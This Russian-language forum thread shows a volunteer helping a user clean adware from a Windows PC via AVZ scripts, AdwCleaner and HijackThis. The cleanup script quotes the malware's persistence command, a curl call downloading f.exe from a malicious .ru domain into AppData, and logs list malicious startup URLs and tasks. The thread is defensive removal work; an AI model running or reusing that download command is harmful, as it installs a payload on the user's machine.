Заблокирован опасный веб-адрес

[Денис Дружинин]

Добрый день.

При открытии любого сайта в Хроме Касперский стал ругаться и выдавать сообщение:

Заблокирован опасный веб-адрес (пример во вложении).

 

Полная проверка на вирусы и проверка Kaspersky Virus Removal Tool 2015 ничего не дала.

Что делать?

CollectionLog-2017.11.28-14.34.zip

[regist]

Здравствуйте!

 

Программы/расширения от Mail.ru используете?

- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Users\Денис\AppData\Roaming\curl\curl.exe', '');
 QuarantineFile('C:\Users\Денис\AppData\Roaming\curl\curl_7_54.exe  -f -s -L http://eltugno.ru/f.exe -o "C:\Users\Денис\AppData\Roaming\curl\curl.exe"', '');
 QuarantineFile('C:\Users\Денис\AppData\Roaming\curl\curl_7_54.exe', '');
 QuarantineFileF('c:\users\денис\appdata\roaming\curl', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0 , 0);
 DeleteFile('C:\Users\Денис\AppData\Roaming\curl\curl.exe', '32');
 DeleteFile('C:\Users\Денис\AppData\Roaming\curl\curl_7_54.exe  -f -s -L http://eltugno.ru/f.exe -o "C:\Users\Денис\AppData\Roaming\curl\curl.exe"', '32');
 DeleteFile('C:\Users\Денис\AppData\Roaming\curl\curl_7_54.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
 DeleteFileMask('c:\users\денис\appdata\roaming\curl', '*', true);
 DeleteDirectory('c:\users\денис\appdata\roaming\curl');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\vtpddiytzk', 'command');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в АВЗ:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)

HijackThis 2.0.2 [2014/11/16 12:03:26]-->"C:\Program Files (x86)\Trend Micro\HijackThis\HijackThis.exe" /uninstall

Эту древность надо бы деинсталировать.

Запустите ..\AutoLogger\HiJackThis\HiJackThis.exe - нажмите Инструменты, прокрутите вниз, нажмите Деинсталяция HiJackThis.

 

 
Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift.

Изменено 28 ноября, 2017 пользователем regist

[Денис Дружинин]

Сделал все по инструкции, запустил скрипты, удалил HijackThis, спасибо.

Программы/расширения от Mail.ru были установлены случайно неделю назад, все были удалены вручную.

https://virusinfo.info/virusdetector/report.php?md5=746F600166A8FFA0D8863DE45B72C42A

KLAN-7234961618

 

CollectionLog-2017.11.28-16.49.zip

[regist]

• Скачайте AdwCleaner и сохраните его на Рабочем столе.
• Запустите его (в ОС Vista/Windows 7/8 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
• Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[s0].txt.
• Прикрепите отчет к своему следующему сообщению.

 

[Денис Дружинин]

Сделал

AdwCleanerS0.txt

[regist]

1) Java 7 Update 55 - устаревшая и дрявая версия, деинсталируйте её.

2)

MediaCaster by Ask [20161113]-->MsiExec.exe /X{4254522D-5637-006A-76A7-A75C790C2D01}
nlchfepkdmeacbccgbfclbjbpnjgepfa [2017/11/22 17:37:18]-->C:\Users\Денис\AppData\Roaming\nlchfepkdmeacbccgbfclbjbpnjgepfa\uninstall.exe

это тоже надо деинсталировать.

 

3)

• Скачайте AdwCleaner и сохраните его на Рабочем столе.
• Запустите его (в ОС Vista/Windows 7/8 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
• Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[s0].txt.
• Прикрепите отчет к своему следующему сообщению.

 

4) Сделайте и прикрепите свежий лог Автологера.

[Денис Дружинин]

Всё удалил

AdwCleanerS0.txt

CollectionLog-2017.11.28-21.01.zip

[regist]

 

 

AdwCleanerS0.txt

перечитайте внимательно, какой лог я просил и прикрепите нужный.

И либо вы вообще не сделали очистку в AdwCleaner, либо выполняли рекомендации не в той последовательности, что я просил. Лог Автологера надо было собирать в конце.

[Денис Дружинин]

Переделал. Лог автологера собрал в конце, что имеется в виду под очисткой AdwCleaner?

AdwCleanerS0.txt

CollectionLog-2017.11.28-22.33.zip

Изменено 28 ноября, 2017 пользователем Денис Дружинин

[regist]

@Денис Дружинин, извиняюсь, оказывается инструкцию по очистке и не дал (а вместо неё второй раз попросил лог сканирования). Исправляюсь

 

• Запустите повторно AdwCleaner (в ОС Vista/Windows 7/8 необходимо запускать через правую кн. мыши от имени администратора).
• В меню Tools ->Options (Инструменты ->Настройки) отметьте:
  
  • Сброс политик IE
  • Сброс политик Chrome
    

  [*]Нажмите кнопку "Scan" ("Сканировать"), а по окончанию сканирования нажмите кнопку "Cleaning" ("Очистка") и дождитесь окончания удаления. [*]Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[C0].txt. [*]Прикрепите отчет к своему следующему сообщению

Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

[Денис Дружинин]

Готово

AdwCleanerC0.txt

CollectionLog-2017.11.28-23.03.zip

[regist]

1)

MediaCaster by Ask [20161113]-->MsiExec.exe /X{4254522D-5637-006A-76A7-A75C790C2D01}

До сих пор не деинсталировали. Сделайте это.

2) - Перетащите лог Check_Browsers_LNK.log Перетащите лог Check_Browsers_LNK.log из папки AutoLogger\CheckBrowsersLNK на утилиту ClearLNK. Отчёт о работе прикрепите.

3) "Пофиксите" в HijackThis:

R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes: DefaultScope = {FFEBBF0A-C22C-4172-89FF-45215A135AC7} - Поиск@Mail.Ru - http://go.mail.ru/distib/ep/?q={SearchTerms}&product_id=%7BCE2556AC-1EDF-4A3C-91BB-E5DD4DAB3469%7D&gp=811014
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} - Поиск@Mail.Ru - http://go.mail.ru/distib/ep/?q={SearchTerms}&product_id=%7BCE2556AC-1EDF-4A3C-91BB-E5DD4DAB3469%7D&gp=811014
O4 - MSConfig\startupreg: [vtpddiytzk] C:\Windows\explorer.exe "http://furyery.ru/?utm_source=uoua03&utm_content=5c960e458ac6158314c6529e8f71f655&utm_term=9FBBF4E43E8232F09F58DB04A0E5DF26&utm_d=20170722" (HKCU) (2017/08/16)
O22 - Task (Queued): wmipr - C:\Users\Денис\AppData\Local\wmipr\wmipr.exe --stid="15154" (file missing)

 

4) Сделайте свежие логи Автологером.

[Денис Дружинин]

MediaCaster by Ask -  деинсталировал

В HijackThis пофиксил

ClearLNK-29.11.2017_13-53.log

CollectionLog-2017.11.29-14.09.zip

[regist]

Что с проблемой?
 

• Пожалуйста, запустите adwcleaner.exe
• Нажмите File (Файл) Uninstall (Деинсталлировать).
• Подтвердите удаление нажав кнопку: Да.

[Денис Дружинин]

Деинсталлировал

Проблема осталась, при запуске браузера сразу выскакивает:

29.11.2017 17.03.32;Заблокирован опасный веб-адрес;http://34.212.131.233/mmp2277/m.html?r=805593;http://34.212.131.233/mmp2277/m.html?r=805593;Веб-адрес;Веб-адресобнаружен в базе вредоносных веб-адресов;Google Chrome;11/29/2017 17:03:32